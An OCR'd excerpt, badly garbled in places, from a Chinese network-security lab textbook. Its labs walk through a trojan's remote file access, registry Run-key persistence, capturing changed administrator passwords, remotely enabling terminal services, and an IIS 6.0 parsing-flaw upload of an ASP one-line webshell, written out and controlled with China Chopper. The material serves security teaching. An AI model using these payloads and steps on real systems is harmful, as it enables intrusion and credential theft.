01-10-2000 04:00 148992 larcldr. exe 
01-10-2000 04:00 162816 
10-18-2002 21:08 0 E| 
10-18-2002 20:56 195 
01-10-2000 04:00 304624  [a]bootfont.bin 
10-18-2002 21:08 0 ["konric.svs 
10-18-2002 21:08 o Fro.sYs 
10-18-2002 21:08 o snos. sys 
01-10-2000 04:00 34468 FINIDETECT. COM 
01-10-2000 04:00 221072 固 mtldz 
03-15-2014 02:26 201326592 lpagefile. sys 
09-19-2002 10:52 54086 "mc. exe 
202520530 Bytes, 13 Files, 5 Folders 
图 


E @ Internet 
9-241 可 以 下 载 对 方 C 盘 的 文件 


I http://192.168. 1. 2:808/%DRIVEXC:/text. txt — Microsoft Internet Explorer 
XD REO SEV KEA IAV 帮助 如 


Oa- O gBa6»i-edg8$535 


Æ] http: //192. 168. 1.2:609/XDRIVEXC: / text. txt 


上 传 成 功 


图 9-242 上 传 成 功 界面 
dE) 


€) A nme 


Ho: [B 


9-243 ”利用 Telnet 命令 登录 707 端口 


C:\Documents and Settings\hdministrator>ipconfig 
ipconfig 


Windows 2000 IP Configuration 


Ethernet adapter 本 地 连接 


Connection-specific DNS Suffix z 

IP fiddress. 192.168.1.2 
Subnet Mask 255.255.255.@ 
Default Gateway - 


[C:\Documents and Settings\Adninistrator> 


9-244 ”登录 到 对 方 的 主机 


首先 将 wnc. exe 和 reg. exe 文件 复制 到 目标 主机 的 winnt 目录 下 ,利用 reg. exe 文件 将 
wnc. exe 文件 加 载 到 注册 表 的 自 启 动 项 目 中 在 DOS 根 目 录 下 输入 命令 “reg. exe add 
HKLMNSOFTW AREMMicrosoftV WindowsNV Current VersonV Run /v service /d wnc. exe", 
执行 过 程 如 图 9-245 Bras 

[c^ MESE CNWINNT\System32Vcmd exe 


:YN?reg-exe add HKLNMNSOFITWRRE\Microsort WindowsNCurrentUers ion\Run /v service /d 
wnc -exe 


时 作 成 功 结束 


图 9-245 më wnc 到 自 启动 程序 


实验 33 ”记录 管理 员 口 令 修 改过 程 
一 、 实 验 目 的 
利用 工具 软件 Win2kPass. exe 记录 管理 员 修 改 的 新 密码 。 
二 、 实 验 所 需 软件 


服务 器 操作 系统 : Windows 2000/Windows XP.IP 地 址 为 192. 168. 1. 2 。 

客户 机 操作 系统 : Windows 2000 Advance Server/ Windows XP.IP 地 址 为 192. 168. 1. 3。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : Win2kPass. exe. 
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三 、 实 验 步骤 


当 入 侵 到 对 方 主机 并 得 到 管理 员 口 令 以 后 ,就 可 以 对 主机 进行 长 久 的 入 侵 。 但 是 好 的 
管理 员 一 般 每 隔 半 个 月 左右 就 会 修改 一 次 密码 ,这 样 已 经 得 到 的 密码 就 会 失效 。 利 用 工具 
软件 Win2kPass. exe 可 以 记录 管理 员 修改 的 新 密码 ,该 软件 将 密码 记录 在 WinntN Temp H 
录 下 的 Config. ini 文件 中 ,有 时 文件 名 可 能 不 是 Config, 但 是 扩展 名 一 定 是 ini, 该 工具 软件 
有 “自杀 ”功能 ,就 是 当 程 序 执行 完毕 后 ,会 自动 删除 。 

首先 在 对 方 的 操作 系统 中 执行 Win2kPass. exe 文件 , 当 对 方 管理 员 修改 密码 并 重启 
后 ,就 会 在 Winnt\Temp 目录 下 产生 一 个 ini 文件 ,如 图 9-246 所 示 。 


选 定 项 目 可 以 查看 其 说 明 。 


另 请 参阅 ; 
我 的 文档 


网 上 邻居 
我 的 由 脑 


图 9-246 密码 修改 记录 文件 


打开 该 文件 可 以 看 到 修改 后 的 新 密码 ,该 文件 只 有 当 密 码 发 生变 化 时 才 会 产生 ,这 时 可 
以 看 到 新 的 密码 是 abcdef, 如 图 9-247 所 示 。 


User=Administrator; Pass-abcdef; Domain=hDSERUER 


图 9-247 密码 记录 文件 的 内 容 , 查 看 密码 
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实验 34 Web 方式 远程 党 面 连接 工具 


一 、 实 验 目 的 
使 用 Web 方式 连接 服务 器 。 


二 、 实 验 所 需 软件 


客户 机 操作 系统 : Windows 2000/Windows XP,IP 地 址 为 172. 19. 25. 1 。 

服务 器 操作 系统 : Windows 2000 Advance Server/ Windows XP,IP 地 址 为 172. 19. 25. 10, 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : 7 个 软件 见 图 9-248. 


m m 国 


bluebarh.gf ^ bluebarv.gf ^ connect.asp 
Win2O00.gf — defauk.htm — msrdp.cab  win2000l.giF 


图 9-248 ”安装 需要 的 软件 


三 、 实 验 步 骤 


将 这 些 文件 设置 到 (复制 ) 本 地 IIS 默认 Web 站 点 的 默认 目录 (c:\inetpub\wwwroot 
下 ) ,如 图 9-249 所 示 ,注意 路 径 。 


|sf&o 查看 |e mim xdeagg9g »m.u| 


Gil scripts cilinetpublscripts 


h IISHelp. linntlhelp! 
i js TISAdmin C:AWINNT\System32\inetsry\isadmin 

SB 2 TSsamples clinetpublissamples 

由 MSADC c:\program files\common fies|systemlmsadc 

IISHelp CAWINNTweblprinters 

85 b Isadmn 

a- n5sampkes 

MSADC 

由 - 国 Printers 
EE- ERE web 站 点 


ge 默认 SMTP 虚拟 服务 器 
1 MU NNTP 虚拟 服务 器 


图 9-249 配置 Web 站 点 


然后 在 本 地 浏览 器 中 输入 “http://localhost” 打 开 连 接 程 序 , 如 图 9-250 所 示 ,在 服务 器 
地 址 文本 框 中 输入 对 方 的 IP 地址 ,再 选择 连接 窗口 的 分 辩 率 , 单 击 “ 连 接 ” 按 钮 连接 到 对 方 
的 桌面 ,如 图 9-251 所 示 。 
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EELIITTUET - Microsoft Internet Explorer ixi 
| XÐ SEO FEV BEW 工具 (D WE) | 
| +m- +- ORAA ue greo 5-3 


Mofas o eae 
Microsoft 
Windows 
远程 桌面 Web 连接 


键入 要 使 用 的 远程 计算 机 的 名 称 ， 选 择 连 接 
的 屏幕 大 小 ， 然 后 单 击 连接 。 


连接 页 打开 时 ， 您 可 以 将 其 寺 加 到 | 收 芯 天 ， E. [172.19.25. 10 


简化 跟 同 一 各 计算 机 的 连接 。 大 小 
c [800x600 E] 


[7 qnx EROSERRE D 


Gm. 


9-250 ”连接 到 终端 


TEA MERRI 172.18.25.109 - Microsoft Internet Explorer 
| ZPO MO FEV WAA IAD EW 
| rme- +- OAAR a me a aM a 


[EAEC fÆ) http: /jlocahost/connect.asp?Server=172. 19. 25. 1087 W=8008rH=6008: 


登录 到 Windows 


基于 on 技术 构建 


— n 
Es | 
mo rrr 


取消 | ano») 


您 已 登录 到 172. 19. 25.10 


4 
[E [[ Bm 7 


图 9-251 登录 终端 服务 的 界面 


实验 35 使 用 工具 软件 djxyxs 开启 对 方 的 终端 服务 


一 、 实 验 目的 


如 果 对 方 不 仅 没 有 开启 终端 服务 .而且 没有 安装 终端 服务 所 需要 的 软件 ,使 用 工具 软件 
djxyxs. exe, 可 以 给 对 方 安装 并 开启 该 服务 。 
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二 、 实 验 所 需 软件 


服务 器 操作 系统 : Windows 2000/Windows XP,IP 地 址 为 192. 168. 1. 2. 

客户 机 操作 系统 : Windows 2000 Advance Server/ Windows XP,IP 地 址 为 192. 168. 1. 3, 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : djxyxs. exe。 


三 、 实 验 步骤 


将 djxyxs. exe 文件 上 传 并 复制 到 对 方 服务 器 的 Winnt\ temp 目录 下 (必须 放置 在 该 目 
录 下 ,否则 安装 不 成 功 ) ,如 图 9-252 所 示 。 上 传 的 方法 很 多 ,可 以 利用 前 面 讲 过 的 建立 信任 


WINNTNTempy>di 
308 ERER. 
的 序列 号 是 B45F-6669 


C: WINNT\Temp 的 目录 


002-10-19 04:45 <DIR> 
002-10-19 04:45 <DIR> - 
03-11-28 22:00 438 Config.ini 
02-10-15 21:46 697,373 djxyxs.exe 
2 个 文件 697,811 字 节 
2 TX 1,988,903,424 可 用 字 节 


WINNT \Tenp> 
半 : 


[ett 


Hi9-252 上传 程序 到 WinntM temp 下 


然后 执行 djxyxs. exe 文件 ,该 文件 会 自动 进行 解压 将 文件 全 部 放置 到 当前 的 目录 下 ， 
执行 命令 查看 当前 目录 下 的 文件 列表 ,如 图 9-253 所 示 , 生 成 了 1386 的 目录 ,这 个 目录 包含 
了 安装 终端 服务 所 需要 的 文件 。 最 后 执行 ,解压 出 来 的 azzd. exe 文件 ,将 自动 在 对 方 的 服 
务 器 上 安装 并 启动 终端 服务 。 这 时 就 可 以 用 前 面 的 方法 连接 终端 服务 器 了 。 


CAWINNT\System32\cmd.ene 
7 NITNNTNTemp?djxyxs -exe 


3nd eps reis 
E Rois B45F-6669 “ 


c:NINNTATenp 的 目录 


pea2-16-19 84:45 
94:45 pa 
22:08 438 Config.ini 
21:46 697,373 djxyxs.exe 
18:21 2,669 azzd.exe 
15:45 28,672 cq.exe 
17:21 62,952 sc.exe 
91:18 11.111 scuj.exe 
12:37 <DIR> 1386 
16:82 29 nraz 
93:52 294 azlj.dat 


883,538 
1.979.490.3084 可 用 字 节 


图 9-253 目录 列表 
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实验 36 ”利用 木马 获取 Web 网 站 权限 


、 实 验 目的 

T fit IIS 6.0 解析 漏洞 的 原理 ,掌握 IIS 6.0 解析 漏洞 的 利用 方法 ,成功 入 侵 网 站 。 
二 、 实 验 所 需 软 件 

服务 器 操作 系统 : 配 有 IIS 6.0 的 Windows Server 2003,IP 地 址 为 193. 168. 1. 8. 

客户 机 操作 系统 : Windows 7/all.IP 地 址 为 193. 168. 1. 100, 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 。 

工具 软件 : Burp Suite, 一句 话 木马 .中 国 菜刀 。 
三 、 实 验 步 又 


(1) 打开 Burp Suite, 设 置 监听 的 地 址 和 端口 ,选择 Proxy 一 Options, 上 默认 情况 下 ,Burp 
Suite 已 经 设置 好 了 代理 地 址 127. 0. 0. 1 和 代理 端口 8080。 如 果 需 要 修改 和 添加 ,直接 单 
击 Edit 按钮 修改 ,或 者 单 击 Add 按钮 增加 即 可 ,如 图 9-254 所 示 。 


E Burp Suite Professional v1.6 - licensed to LarryLau NEN 


Burp intruder Repeater Window Help 
Te Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 


intercept | HTTP history | WebSockets i 


图 Proxy Listeners 如果 需 要 增加 基 他 代理 IP 和 端口 ， 则 点 击 Add 


qa] Buro Proxy usegyplerersio receive incoming Hj requests from your browser. You wil need lo configure your browser to use one of the i 


| mvsible | Redirect | Certificate 
127.00.1:8060 8 Per-host 


默认 已 经 添加 了 一 个 127.0.0.1 Hi 1175808085 3 


如 果 需 要 修改 则 点 单 此 技 钮 


Each installation of Burp generates its own CA certificate that Proxy listeners can use when negotiating SSL connections. You can import or ex 


CA certificate ... 


图 9-254 设置 Burp Suite 代理 


(2) 当 Burp Suite 设置 好 之 后 ,需要 将 浏览 器 代理 配置 信息 设置 为 同 Burp Suite 一 样 ， 
这 样 才 可 以 让 Burp Suite 抓 取 到 浏览 器 数据 。 这 里 用 火狐 浏览 器 做 测试 进行 设置 代理 。 打 
开火 狐 浏 览 器 ,设置 浏览 器 代理 地 址 为 127. 0. 0. 1 ,端口 为 8080, 如 图 9-255 所 示 。 

(3) Æ Burp Suite 中 选择 Proxy Intercept $% Intercept 打开 ,如 图 9-256 所 示 。 

如 果 状 态 是 处 于 Intercept is on, 则 浏览 器 所 有 流量 数据 都 被 Burp Suite 拦截 ,并 且 需 
要 单 击 Forward 按钮 才能 放 过 数据 包 .也 可 以 通过 此 界面 修改 数据 包 再 Forward 提交 。 

如 果 状 态 处 于 Intercept is off, 则 浏览 器 所 有 流量 数据 都 会 被 Burp Suite 记录 ,记录 到 
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配置 访问 国际 互联 网 的 代理 
€) 不 使 用 代理 
O 自动 检测 此 网 络 的 代理 设置 (W) 
€) 使 用 系统 代理 设置 (U) 
© 手动 配置 代理 : (M) 
HTTP 代理 : 9 127.0.0.1 s0:® soso 
[v] 为 所 有 协议 使 用 相同 代理 (S) 
SSL 代理: [127001 S0: | 8080 月 
ETp 代理 [127.0.0.1 S0: | sos 
SOCKS 主机 : [127001 S0:0 | sosoc 
SOCKSv4 @ SOCKSvS [7] imf DNS 


图 9-255 设置 浏览 器 代理 


Target Spider | Scanner | intruder | Repester | Sequencer | Decoder | Comparer | Extender | Options | Alerts 


fee HTTP wisiory [ wotsoctets natory | op | 


图 9-256 设置 Intercept 为 启动 状态 


HTTP history 中 ,需要 查看 时 单 击 HTTP history, 找 到 对 应 的 浏览 器 请 求 URL 即 可 查看 
到 当时 提交 的 数据 和 浏览 器 返回 的 状态 情况 。 

(4) 在 浏览 器 地 址 栏 中 输入 “http://193. 168. 1. 8/usercenter/login. aspx”, 访 问 该 网 
站 ,可 看 到 Burp Suite 已 经 成 功 截获 了 浏览 器 发 起 的 HTTP 请 求 , 如 图 9-257 所 示 。 


Burp ntruder Repeater Wndow Heb 
Spider | Scanner | intruder | Repester | Sequencer | Decoder | Comparer | Extender | options | airs 


Params |Edied Status |Lengh |MMEtype | Edenson |Tte 
Bg B m» 3494. HTML asp gæi 

oer 8 日 P 

or @ 日 rt 

cer e 日 E 

p @ @ ut 

oer e a z 

oer G a can 
hitp.//193.168.1.8 GET 日 日 B 
hp 193 168 18 oer e ø aspx 
mtpns3.168.1.8 er 8 日 o 


图 9-257 Burp Suite 拦截 报 文 信息 图 
(5) 打开 HTTP history, 可 看 到 之 前 拦截 的 所 有 请 求 的 历史 记录 。 任 意 选择 一 个 , 单 
i FH) Response 查看 服务 器 banner, 如 图 9-258 所 示 。 
发 现 服务 器 运行 的 是 IIS 6. 0,IIS 6. 0 普遍 存在 解析 漏洞 且 微软 未 对 其 发 布 补丁 ,如 果 
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hiplg-fox en eer "wg S E 
| [mpirmiisis — GET  musercenterjsindmnvadmins 0 Om — 3999 set gE 
http//193.168.1.8. GET Jusercenteris/query mn js 日 Bg e 72589 sot » 
Mipi193.108.18. GET sleservervaldateCode2aspxrcoole — Gi S ma 
hp193168.18 GET Maviconieo 日 GO s ua mm mm -60p% Að d 
* 


HTTP/1.1 200 OK 
ent-Length: 39573 
Type! application/s-dsvamoript 
Tue, 13 Sep 2011 02:13:59 GMT 


, 02 Feb 2016 04:11:08 GMT 


图 9-258 ”查看 Burp Suite history 的 历史 报 文 


网 站 可 以 注册 用 户 可 以 试 着 通过 注册 普通 账户 上 传 图 片 获取 网 站 权限 。 
(6) 去 掉 Burp Suite 数据 包 拦 截 功能 , 单 击 Intercept 标签 将 之 前 的 on 状态 转换 为 off 
状态 ,不 进行 拦截 数据 包 , 如 图 9-259 所 示 。 


图 9-259 Intercept 为 off 状态 


CD 访问 http://193. 168. 1. 8/usercenter/login. aspx, 尝 试 注册 网 站 会 员 , 如 图 9-260 
所 示 。 


FEE SITESERVER — 
账号 : 
265: 
验证 码 : 


[3| 5772. 8K 


登录 
图 9-260 目标 网 站 登录 界面 


(8) 单 击 “ 注 册 新 用 户 ”, 注 册 名 字 为 test1111, 如 图 9-261 所 示 。 
(9) 注册 成 功 后 登录 网 站 ,进入 用 户 中 心 ,如 图 9-262 所 示 。 
(10) 找到 “文档 附件 管理 ”>“ 上 传 文件 ”, 如 图 9-263 所 示 。 
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用 户 和 名 testilll 
检测 用 广 名 是 否 可 用 


WE: testilll 
SEIS MSHUEREE , EEEN 


EB: e 
密码 强度 : 出 00000 88 


字符 ,支持 大 小 写字 母 、 数 字 和 符号 


Email : afdasd@sina.com 
宕 的 电子 部 箱 ,忘记 密码 时 棕 发 送 密码 到 此 部 箱 


请 内 入 验证 码 : t6uw 
按 下 图 字符 镇 写 , 不 区 分 大 小 写 


tóuw 


| T || ames 


图 9-261 注册 新 账号 


欢迎 回来 ; test1111 
ESITESERVER mero 
首页 。 内 容 投稿 ë 空间 管理 
个 人 信息 当前 位 置 : 个 人 信息 》 用 户 首页 
ts weit 
修改 账户 信息 上 次 登录 时 间 : 2016-02-02 12-38 
gus 
psen Q sarene gp aen 
A manes P2 
"n— © emesa D Heem 
文档 附件 管理 
图 9-262 利用 注册 账号 登录 目标 网 站 
[| 欢迎 回来 : test1111 
ESITESERVER meto 
首页 。 ”内 容 投 稿 ë SAER 
tinm, xn xat 
用 户 首页 
修改 隆 户 信息 文档 附件 管理 
容量 ; 120M 
saam a Ld 120M 
USE ^ 单 文件 限制 : 5M 


图 9-263 目标 网 站 注册 账号 内 的 上 传 文件 
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(OD 新 建 一 个 文本 文件 , 写 人 二 %eval request C" test" 4>, {EFH 1. asps. txt( 其 中 
test 为 连接 密码 ) , 试 着 上 传 1. asp;. txt 文件 ,如 图 9-264 所 示 。 


图 9-264 上 传 刚 创建 的 文件 
(12) 单 击 * 上 传 ”按钮 ,如 图 9-265 所 示 。 


EE 
图 9-265 ”上传 文件 报错 


(13) 文件 名 带 有 asp 不 可 上 传 ,IIS 还 可 解析 cer 文件 。 尝 试 将 文件 名 改 为 1. ceri 
.txt, 青 次 上 传 ,如 图 9-266 所 示 。 


此 文件 格式 流 管 理 员 禁 上 ,请 更 按 文件 上 传 
Omahe: [P] cerot 


上 传 取消 


图 9-266 再 次 上 传 新 文件 
(14) 单 击 * 上 传 ”按钮 ,上 传 成 功 ,可 显示 已 经 上 传 的 文件 ,如 图 9-267 所 示 。 单 击 文 
件 ,再 单 击 “ 浏 览 ” 按 钮 可 打开 该 文件 ,如 图 9-268 所 示 。 


首页 内 容 投稿 空间 管理 


Ome er Mar SREM ~ 二 上 传 文人 Pme X HUS 


Det 当前 目录 : BARZ 


1.cer, bif] 


图 9-267 上 传 新 文件 成 功 
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加 文人 3 型: 文本 文档 z 
ex: 1KB 

O ag£stiB : 2016-02-02 12:54:45 

O REBRA: 2016-02-02 01:04:31 

刀 景 后 访问 时 间 : 2016-02-02 01:04:31 


浏览 关闭 - 
图 9-268 浏览 新 上 传 文件 


(15) 显示 空白 页 面 ,不 是 文件 不 存在 ,而 是 网 页 已 经 被 执行 了 ,具体 可 抓 包 看 http 响 
应 头 为 200, 而 不 是 404。 打 开 中 国 菜刀 , 单 击 空白 地 方 , 单 击 * 添 加 ”按钮 ,在 地 址 栏 中 输入 
“http://193. 168. 1. 8/SiteFiles/UserFiles/test1111/1. cer;. txt" ,后面 填 写 链 接 密码 test, 
脚本 类 型 选择 ASP, 单 击 “ 添 加 ”按钮 ,如 图 9-269 所 示 。 


地 址 : [p:77193. 168. 1. 8/Si teFiles/UserFiles/testllll/l. ceri txt [test 


mE: 
备注 : 
[Ws -sl —— -] Em 


图 9-269 ”中国 菜刀 添加 木马 


(16) 右 击 刚刚 添加 的 shell ,选择 "文件 管理 ”", 即 可 进入 操作 界面 。 可 以 浏览 .删除 、 编 
辑 和 上 传 文件 ,如 图 9-270 所 示 。 


Ooiw1s + ».D0x 
ac iim EMI eoe MEHR 
195.108.1.8 BROD, XO) E Ha xh — H& — GAS 
Ecate mi rr Mum 
C3 Decents und Settings 2015-09-05 17:23:50 0 1 © BRIR 
[LE 2015-09-21 08:40:55 0 18 快捷 方式 
È hop 2015-09-21 08:40:55 0 1 
È rrogen Files 2015-09-21 08:52:39 0 (T 
(à Mcrcum ?015-09-21 10:27:02 0 2 
B ssn 2015-09-21 08:47:20 0 1 
E Syrtes Volume Inforsation 2015-09-21 08:40:55 0 2 
me 2015-09-21 11:19:52 0 1 
(Cà Systen Volume Information 已 mors 2015-09-21 08:54:08 0 16 
Qa tnmors mb 2015-09-05 17:20:08 0 15 
pem 国 Amogmc sar 2015-09-05 17:19:49 0 E 
E toot. ini 2015-0905 17:14:19 210 5 
C beot font bi 2003-09-27 20:00:00 xem» 39 
D corrs. srs 2015-09-05 17:19:49 0 x 
国 m srs 2015-09-05 17:19:49 0 » 
B mos. srs 2015-09-05 17:19:49 0 » 
加 oerect cow 2007-02-18 00:02:28 47772 E] 
L]stáe 2007-02-18 00:02:48 306288 — 38 


A 9-270 目标 主机 文件 管理 界面 


总 结 : IIS 6.0 和 Windows Server 2003 在 网 络 应 用 服务 器 的 管理 可用性、 可靠 性 、 安 
全 性 、 性 能 和 可 扩展 性 方面 提供 了 许多 新 功能 ,在 中 小 型 企业 中 使 用 较 广 .应 注意 及 时 更 新 
服务 器 版 本 并 打 补丁 。 


298 计算 机 网 络 安全 与 实验 教程 (第 二 版 ) 


实验 37 利用 木马 进行 系统 提 权 


一 、 实 验 目 的 
T fit IIS 6.0 解析 漏洞 的 原理 ,掌握 系统 提 权 方法 ,以便 成功 控制 服务 器 。 
二 、 实 验 所 需 软件 


服务 器 操作 系统 : 配 有 IIS 6.0 的 Windows server 2003,IP 地 址 为 193. 168. 1. 32, 

客户 机 操作 系统 : Windows 7/all,IP 地 址 为 193. 168. 1. 100, 

工具 软件 : Nmap、 中 国 菜 刀 、Churrasco( 巴 西 烤肉 ,用 于 系统 提 权 )、lcmd. exe RER 
统 本 身 的 cmd, 使 普通 用 户 具备 更 多 的 权限 去 执行 其 他 命令 ) 


三 、 实 验 步 骤 


CD 打开 浏览 器 ,访问 http://193. 168. 1. 32: 82, 单 击 “ 新 用 户 注册 ”。 用 户 名 为 
test1111. asp, 密 码 为 password. Al] 9-271 一 图 273 所 示 。 


EN —1 


mitScv 


TRER | 登录 


ware saen 


图 9-271 注册 新 用 户 1 


欢迎 您 主 册 成 为 动易 网络 用 户 e 
WS Pbi. 只 有 接受 协议 才能 继续 进行 注册 。 f 


1. BARREIA 
ASPRA PRANK ADIFU BRAA « zh PUSH RERO IR HI 
照 有 关 章程 、 服 务 条 款 和 操作 规 刚 严格 执行 。 用 户 通过 注册 程序 点 击 “ 我 同意 ” RA MATAAS 
Mubipuru or ad 


动易 服务 

DBISQACIE CRUS PIERURRES RS 图 片 浏览 、 软 件 下 载 、 网 上 
留言 和 BBS 论坛 容 服 务 。 

用 户 必须 : 

刀 购 置 设备 ， 包 括 个 人 电脑 一 台 、 RAS SEGELRHRE 

DEALER EARR PARA 

DEREN. ERICEVDT AGB 

D'REÍBECERISH FARN VER PANER BOSE FrSHISSIRI 


为 注册 资料 * 

习 用 户 同意 道 守 《 中 华人 民 共 和 国保 守 国 家 秘密 法 小 、 长 中 华人 民 共 和 国 计 算 机 信 
息 系 统 安全 保护 条 例 放 、《 计 算 机 软件 保护 条 例 少 等 有 关 计算 机 及 互联 同 规定 的 法 律 和 法 规 、 实 施 办 
法 。 在 任何 情况 下 ， 动易 隐 络 合理 地 认为 用 户 的 行为 可 能 违反 上 述 法 律 、 法 规 ,动易 隐 纵 可 以 在 任何 ~ 
Bie. 此 向 该 用 户 提供 服务 。 用 户 应 了 解 国际 互联 网 的 无 国界 性 ， 应 特别 注意 遵守 当 


M: 


互联 风电 子 公告 服务 管理 规定 全文 

中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 
中 华人 民 共 和 国 计 算 机 信息 系统 支 全 保护 条 例 

计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 


我 同意 | | 不 同意 


图 9-272 ”注册 新 用 户 2 
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RAHAS 会 员 名 : " 

填写 注册 资料 > 会 员 名 和 密码 用 : o 

F 会 员 名 不 能 少 于 外 字符 《两 个 汉字 ) d 

会 员 名 不 能 超过 20 个 字符 (10 个 汉字 ) 

358 EF 少 6 位 ): 

请 输入 密码 ， 区 分 大 小 写 。 请 尽量 设 得 夏 录 一些 , 以 “essesees 

防 被 人 蜡 力 铺 解 
确认 密友 Ehe): 
请 再 输 一 这 确认 
密码 问题 : Eee | 
忘记 宙 码 的 提 示 问 题 , 最 好 设 所 别人 不 知道 和 的 间 SEBEMSET! 
题 ， 以 防 被 人 用 找 回 密码 功能 而 取 您 8 帐号 。 Se? x 
问题 答案 : 
忘记 密码 的 提示 问题 兰 案 ， 用 于 取 回 密码 m 
JESUS E. USYUREIEETDRER: 
piede 


Email 地 址 : 
aiai 以 便 我 们 可 以 及 时 和 你 联 。 asffasdf@sina.com| 
以 上 所 有 信息 都 必须 先 正确 填 瑟 后 才能 继续 下 一 步 注 册 操 作 。 
提交 注册 信息 
图 9-273 ”注册 新 用 户 3 
(2) 注册 成 功 后 ,在 网 站 登录 界面 进行 登录 ,并 单 击 用 户 登 录 附 近 的 “会 员 中 心 ”, 如 
图 9-274 所 示 。 


REMPHA 


testilil.. 
资金 余额 : 
经 验 积分 : 
可 用 点 券 : 
剩余 天 数 : o 
待 答 文 章 : 
MAER: 0 条 
登录 次 数 : 4 次 
【会 员 中 心 】 【注销 登录 ] 
图 9-274 ”使 用 注册 账户 登录 网 络 


G) 单 击 “我 的 聚合 "~ 申请 聚合 空间 一“ 立即 申请 开通 我 的 聚合 空间 ”, 如 图 9-275 
所 示 。 


| S 多 现在 的 位 置 : 动易 网 络 > 会员 中 心 我 的 聚合 管理 


立即 申请 开通 我 的 聚合 空间 ， 


图 9-275 ”申请 聚合 空间 
CD 在 “申请 我 的 聚合 空间 ”页 面 存 在 一 个 上 传 文件 的 功能 ,如 图 9-276 所 示 。 通 过 尝 


试 上 传 PHP 文件 时 弹出 了 以 下 消息 框 ,如 图 9-277 所 示 , 说 明 网 站 对 上 传 文件 进行 了 文件 
类 型 检测 ,在 这 种 情况 下 需要 确定 服务 器 主机 的 Web 服务 软件 和 系统 版 本 。 
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来 自 网 页 的 消息 


这 种 文件 类 型 不 允许 上 传 ! 


h 


只 允许 上 传 这 几 种 文件 类 型 : gifpglipeglipelbmplpng 


:照片 地 址 
[LE] 


图 9-276 ”申请 聚合 空间 内 上 传 点 图 9-277 上 传 文件 报错 


终端 


(5) 在 DOS X Bx, Kali ź ,输入 “nmap 
行 主机 识别 ,扫描 结果 如 图 9-278 所 示 。 
WË CAWindowsVsystem32Vcmd.exe 


Microsoft windows [version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. 


sS-O 193. 168. 1. 32”, 使 用 Nmap 对 目标 进 


All rights reserved. | 
C:\Users\wangFW>nmap -sS -0 193.168.1.32 | 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-02 14:09 ?D1.2 恬 
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disable 
Try using --system-dns or specify valid servers with --dns-servers 
Nmap scan report for 193.168.1.32 
Host is up (0.00053s latency). 
Not shown: 989 closed ports 
STATE SERVICE 
open domain 
http 
hosts2-ns 
xfer 
kerberos-sec 
ms rpc 
netbios-ssn 
microsoft-ds 
IIS 
unknown 
ms- sgl-s 
:5 E 7 
ie 十 证 purpose 
Microsoft Windows 2003 
cpai/o:icrosolt-windowscserverc2UQd 
sp. 
S details: Microsoft Windows Server 2003 SP1 or SP2 
esr Distance: 1 hop 


spl cpe:/o:microsoft:windows serve| 


图 9-278 Nmap 扫描 目标 主机 信息 


从 扫描 结果 可 看 出 目标 操作 系统 为 Windows Server 2003 ,并 开启 了 HIS 服务 。 


而 该 系 


统 默认 安装 的 IIS 为 6.0 版 本 .IIS 6.0 存在 解析 漏洞 ,会 将 以 “x. asp” 这 种 格式 命令 的 文件 
夹 下 的 所 有 文件 都 解析 为 asp 文件 。 新 建 一 个 文件 ,将 如 下 一 句 话 木 马 代 码 二 % eval 


request( "test")% 


站 ,如 图 9-279 和 图 


(test 为 链接 密码 ) 写 人 , 阐 


9-280 所 示 。 


(6) 网 站 在 这 里 回 显 以 网 站 根 目录 为 父 


击 文件 另存 为 wang. jpg, 然 后 将 其 上 传 到 网 


路 径 的 上 传 地 址 ,并 且 服 务 器 已 经 将 木马 文件 


名 根据 时 间 截 重 命名 ,路径 显 示 在 复 选 框 中 ,复制 链接 再 加 上 服务 器 IP 即 为 木马 存放 地 址 ， 


即 http://193. 168. 


中 国 


菜刀 , 单 
1 


Space/testl 
TÉ ASP, Hd 


条 加 


1. 32: 


”按钮 ,如 图 9-281 所 示 。 


:82/Space/test1111. 
fF 空 白地 方 , 单 击 “ 添 加 ”按钮 ,在 地 址 栏 中 输入 http: 


. asp/201602/2016020214 810. jpg. 


asp/201602/20160202144* 


pi 


55810. jpg. 
/193. 168. 1. / 
后 面 填写 链接 密码 test， Wen 


WangFW 
系统 文件 夫 
计算 机 
系统 文件 夫 
网 络 
Xét 
wa 
EU jpEG me 
rp 
N): wang * 
图 9-279 上 传 木马 图 片 
3 ED 
地 址 : [7-32-6275psce/testll11 asp/201602720160202144355610 jpg [tesi 
配置 : 
备注 : 
/Spaceltestllll.asp/201602 : 照片 地 址 默认 类 别 了 ] [脚本 类 型 了 ]|cazslz -] 添加 
图 片上 传 成 功 ! 
图 9-280 上 传 木马 图 片 成 功 图 9-281 中 国 菜刀 连接 木马 


CD 右键 单 击 shell ,选择 "文件 管理 ,目标 主机 的 文件 目录 已 经 呈现 出 来 ,并 且 还 有 上 
传 .删除 权限 ,如 图 9-282 和 图 9-283 所 示 。 


LN cm 


I http: //193. 168. 1. 32:82/Space/test1111. asp/201602/201... -1 2016-02-02 14:... 


图 9-282 shell 右键 功能 
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[m] 2193. 168. 1.32 + 
E C: \netpub\wewroot\PowerEasyiSpace\test1111. asp\201602\ 该 取 
193. 168. 1.32 BERO, RAW 名 称 时 间 大 小 属性 
t S] 20160202144355810. jpg 2016-02-02 14:43:55 24 E: 
EC 
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图 9-283 目标 网 站 文件 管理 


(8) 虽然 已 经 拿 到 网 站 的 webshell, 但 此 时 权限 较 低 ,无 法 控制 目标 主机 ,也 无 法 渗透 
